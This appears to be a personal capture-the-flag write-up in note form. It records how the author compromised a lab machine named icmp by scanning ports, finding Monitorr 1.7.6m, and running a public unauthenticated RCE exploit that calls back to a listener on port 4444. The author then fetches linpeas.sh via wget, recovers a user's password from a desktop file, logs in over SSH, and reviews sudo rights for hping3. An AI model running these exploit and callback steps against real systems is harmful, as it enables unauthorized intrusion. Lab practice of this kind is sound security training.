Given Target [LAB_IP]

rustscan [LAB_IP] 22/tcp open ssh syn-ack 80/tcp open http syn-ack

nmap -sC -sV -p22,80 [LAB_IP] -oN icmp.nmap -v

dirbuster

http://[LAB_IP]

Monitorr software on home page v 1.7.6m

searchsploiut found searchsploit monitorr 10:26:23 Monitorr 1.7.6m - Authorization Bypass | php/webapps/48981.py Monitorr 1.7.6m - Remote Code Execution (Unauthenticated) | php/webapps/48980.py Shellcodes: No Results Papers: No Results

Target url: http://[LAB_IP]/mon/

python3 48980.py http://[LAB_IP]/mon/ [LAB_IP] 4444

got em

![[Pasted image 20231104122952.png]]

[HASH_REDACTED]

Priv Esc

No curl for linpeas non donwnload

download method

python -m http.server 80

wget http://[LAB_IP]/linpeas.sh
chmod +x linpeas.sh

Not normally vuln.

Strange file in Fox's desktop ![[Pasted image 20231104124120.png]]

seems to be an encrypted password with "da" as the decrypt key

BUHNIJMONIBUVCYTTYVGBUHJNI , da //de seems to be the encrypt key

ssh fox@[LAB_IP]

tried it and it seems it's his password

now I'm him

![[Pasted image 20231104124622.png]]

Finally actually have a password

$ sudo -l [sudo] password for fox: Matching Defaults entries for fox on icmp: env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin User fox may run the following commands on icmp: (root) /usr/sbin/hping3 --icmp * (root) /usr/bin/killall hping3